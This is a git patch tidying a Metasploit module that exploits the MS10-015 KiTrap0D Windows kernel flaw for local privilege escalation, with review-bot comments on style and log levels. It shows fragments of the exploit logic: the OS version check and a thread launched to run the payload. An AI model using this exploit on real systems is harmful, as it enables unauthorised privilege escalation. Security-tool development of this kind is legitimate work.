From e4fc361b373bd41c99420f172d8ac4c906301580 Mon Sep 17 00:00:00 2001
From: OJ
Date: Wed, 13 Nov 2013 10:38:48 +1000
Subject: [PATCH] Various tidies and fixes
* Change ranking.
* Update references to comply with correct approach.
* Update messages to better describe what should happen.
* Update the Windows version regex to match XP.
* Update `check` function to use `unless`.
Thanks again @jvazquez-r7 for the feedback!
---
 .../exploits/windows/local/ms10_015_kitrap0d.rb | 16 +++++++---------
 1 file changed, 7 insertions(+), 9 deletions(-)
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
index 905da9d64d..e9372f1f27 100644
--- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb
+++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb
@@ -8,10 +8,8 @@ require 'msf/core/exploit/exe'
 require 'rex'
 class Metasploit3 < Msf::Exploit::Local
- # TODO: ask Juan/Sinner/Wvu what this should be
- Rank = ExcellentRanking
+ Rank = GreatRanking
- include Exploit::EXE
 include Post::File
 include Post::Windows::Priv
@@ -45,9 +43,9 @@ class Metasploit3 < Msf::Exploit::Local
 'References' => [
 [ 'CVE', '2010-0232' ],
 [ 'OSVDB', '61854' ],
- [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ],
- [ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/MS10-015' ],
- [ 'URL', 'http://www.exploit-db.com/exploits/11199/' ]
+ [ 'MSB', 'MS10-015' ],
+ [ 'EDB', '11199' ],
+ [ 'URL', 'http://seclists.org/fulldisclosure/2010/Jan/341' ]
 ],
 'DisclosureDate'=> "Jan 19 2010"
 ))
@@ -62,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Local
 # Validate OS version
 winver = sysinfo["OS"]
- if winver !~ /Windows 2000|Windows Vista|Windows 2003|Windows 2008|Windows 7/
+ unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/
 return Exploit::CheckCode::Safe
 end
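Review bot: With `include Exploit::EXE` removed in the first hunk (`@@ -8,10 +8,8 @@`), the `require 'msf/core/exploit/exe'` that the hunk header still shows above `require 'rex'` looks unused. If nothing else in the module relies on it, that line should go in the same tidy so the file's requires match what the class mixes in. The class body continues outside the hunk, so another use of the EXE mixin cannot be ruled out from here.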
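Review bot: The OS gate in the third hunk (`@@ -62,7 +60,7 @@`) wraps a single `return` in a three-line `unless … end`; a guard clause says the same thing more directly: `return Exploit::CheckCode::Safe unless winver =~ /Windows (?:2000|XP|Vista|2003|2008|7)/`. The match is on the product name only, and the existing `# Validate OS version` comment does not say where the list comes from, so a maintainer widening it again (as this commit does for XP) has nothing to check it against; a comment naming the source of the list would fix that. `check` continues outside the hunk, so whether anything beyond the name is verified cannot be seen from here.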
@@ -74,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Local
 fail_with(Exploit::Failure::None, 'Session is already elevated')
 end
- if check() == Exploit::CheckCode::Safe
+ if check == Exploit::CheckCode::Safe
 fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
 end
@@ -115,7 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
 print_status("Exploit executed. Executing payload...")
 # Finally run our payload
 host_process.thread.create(payload_mem, 0)
- print_good("Exploit finished, wait for a new (hopefully privileged) session.")
+ print_good("Exploit finished, wait for a new (hopefully privileged) session.")
 end
 protected
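Review bot: In the last hunk (`@@ -115,7 +113,7 @@`) the new message is still emitted with `print_good`, which reports a positive result although nothing in the visible lines confirms one; the return value of `host_process.thread.create(payload_mem, 0)` is discarded. Since the new wording itself says the outcome is only hoped for, `print_status("Exploit finished, wait for a new (hopefully privileged) session.")` would match the log level to what is actually known at that point. Anyone reading the console output or a saved log would then not mistake a completed run for a confirmed result. The enclosing method starts outside the hunk.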